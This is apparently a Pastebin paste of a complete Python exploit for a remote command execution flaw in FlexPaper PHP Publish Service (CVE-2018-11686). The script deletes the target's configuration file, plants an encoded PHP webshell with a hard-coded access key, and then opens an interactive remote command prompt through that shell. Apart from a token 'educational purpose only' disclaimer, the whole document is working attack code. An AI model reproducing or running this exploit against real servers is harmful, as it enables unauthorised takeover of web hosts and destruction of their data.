API tools faq
paste
INDOXPLOIT

Flexpaper RCE

INDOXPLOIT
Oct 19th, 2019
331
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.15 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/env python
  2. #Exploit Title: FlexPaper PHP Publish Service <= 2.3.6 RCE
  3. #Date: March 2019
  4. #Exploit Author: Red Timmy Security - redtimmysec.wordpress.com
  5. #Vendor Homepage: https://flowpaper.com/download/
  6. #Version: <= 2.3.6
  7. #Tested on: Linux/Unix
  8. #CVE : CVE-2018-11686
  9. #Disclamer: This exploit is for educational purpose only
  10. #More details on https://redtimmysec.wordpress.com/2019/03/07/flexpaper-remote-code-execution/
  11.  
  12. import sys
  13. import requests
  14. import readline
  15. import urllib2
  16. import ssl
  17.  
  18. try:
  19. url = sys.argv[1]
  20. except:
  21. print "[-] usage $python shredpaper.py http://targert.com/flexpaper/"
  22. print sys.exit(1)
  23.  
  24. print """
  25. __ __
  26. _____/ /_ ________ ____/ ____ ____ _____ ___ _____
  27. / ___/ __ \/ ___/ _ \/ __ / __ \/ __ `/ __ \/ _ \/ ___/
  28. (__ / / / / / / __/ /_/ / /_/ / /_/ / /_/ / __/ /
  29. /____/_/ /_/_/ \___/\__,_/ .___/\__,_/ .___/\___/_/
  30. /_/ /_/
  31. """
  32.  
  33. print "[*] FlexPaper <= 2.3.6 Remote Command Execution - Red Timmy Security)"
  34. print "[*] Attacking %s" %url
  35. print "[*] Deleting target configuration file"
  36. payload = (("SAVE_CONFIG","1"),("PDF_Directory","/var/www/html/flex2.3.6/flexpaper/pdf"),("SWF_Directory","config/"),("LICENSEKEY",""),("splitmode","1"),("RenderingOrder_PRIM","flash"),("RenderingOrder_SEC","html"))
  37. url1 = url+"/php/change_config.php"
  38. r1 = requests.post(url1, data=payload)
  39. rx = requests.post(url1, data=payload) #resend
  40. shellcode = "%69%64%3b%65%63%68%6f%20%50%44%39%77%61%48%41%4b%43%69%52%72%5a%58%6b%67%50%53%41%6b%58%30%64%46%56%46%73%6e%59%57%4e%6a%5a%58%4e%7a%4a%31%30%37%43%67%70%70%5a%69%67%6b%61%32%56%35%50%54%30%6e%4d%44%6b%34%4e%7a%63%7a%4e%7a%59%78%4d%54%59%30%4e%7a%49%33%4e%44%49%33%4f%44%51%7a%4d%6a%51%34%4d%6a%52%74%65%47%31%74%65%47%30%6e%4b%58%73%4b%43%67%6c%6c%59%32%68%76%49%48%4e%6f%5a%57%78%73%58%32%56%34%5a%57%4d%6f%59%6d%46%7a%5a%54%59%30%58%32%52%6c%59%32%39%6b%5a%53%67%6b%58%30%64%46%56%46%73%6e%59%32%31%6b%4a%31%30%70%4b%54%73%4b%43%6e%30%37%43%6a%38%2b%43%67%3d%3d%7c%62%61%73%65%36%34%20%2d%64%20%3e%24%28%70%77%64%29%2f%74%69%67%65%72%5f%73%68%65%6c%6c%2e%70%68%70%3b%69%64"
  41.  
  42. print "[*] Uploading webshell.."
  43. url2 = url+"/php/setup.php?step=2&PDF2SWF_PATH="+shellcode
  44. r2 = requests.get(url2)
  45. print "[*] Checking if shell is uploaded successfully"
  46.  
  47. webshell = url+ '/php/tiger_shell.php'
  48.  
  49. check_shell = requests.get(webshell)
  50. if check_shell.status_code == 200:
  51. print "[*] We got a shell"
  52. else:
  53. print "[-] Exploit failed, die"
  54. sys.exit(2)
  55. ctx = ssl.create_default_context()
  56. ctx.check_hostname = False
  57. ctx.verify_mode = ssl.CERT_NONE
  58. while True:
  59. cmd = raw_input("enter cmd>>")
  60. cmd = cmd.strip()
  61. cmd = cmd.encode('base64').strip().replace("\n","")
  62. link = url+"/php/tiger_shell.php?cmd=%s&access=09877376116472742784324824mxmmxm" %cmd.strip()
  63. #print link
  64. try:
  65. response = urllib2.urlopen(link, context=ctx)
  66. page = response.read()
  67. print page
  68. except Exception as exc:
  69. print exc
  70. continue
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!